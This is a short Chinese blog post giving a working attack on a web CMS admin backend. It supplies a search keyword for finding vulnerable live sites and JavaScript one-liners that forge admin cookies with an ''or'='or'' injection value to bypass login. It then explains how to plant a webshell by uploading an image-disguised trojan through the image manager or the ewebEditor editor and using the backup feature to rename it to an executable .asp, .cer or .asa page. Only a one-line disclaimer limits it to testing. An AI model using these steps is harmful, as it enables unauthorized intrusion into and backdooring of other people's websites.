该
漏洞出来有些时候了,可是现在依然存在而且不少,可以直接cookie欺骗进入后台成功率高达百分之99
关键字:inurl:szwyadmin/login.asp
1
|
javascript
:
alert
(
document
.
cookie
=
"adminuser="
+
escape
(
"'or'='or'"
)
)
;
javascript
:
alert
(
document
.
cookie
=
"adminpass="
+
escape
(
"'or'='or'"
)
)
;
javascript
:
alert
(
document
.
cookie
=
"admindj="
+
escape
(
"1"
)
)
;
|
然后后台登录入口的login.asp改为admin_index.asp
(login.asp是后台登录页面admin_index.asp是成功登录后的页面)
这样就成功进入了后台,拿webshell的方法也很简单直接上传一张图片格式的木马然后在备份下即可。
上传图片的地方有二处
1.图片管理-添加图片-缩略图:[上传图片]
2.新闻增加-然后就可以看到ewebEditor编辑器然后在上传图片即可
最后在把图片格式的木马备份成功可解析的网页木马格式 例如:asp cer asa 等
个人感觉小残已经写的很简单明了,如果还有的大大实在不懂的可以在小残博客下方留言
声明:本站所有文章及软件工具只供安全测试,请勿用于非法用途 谢谢。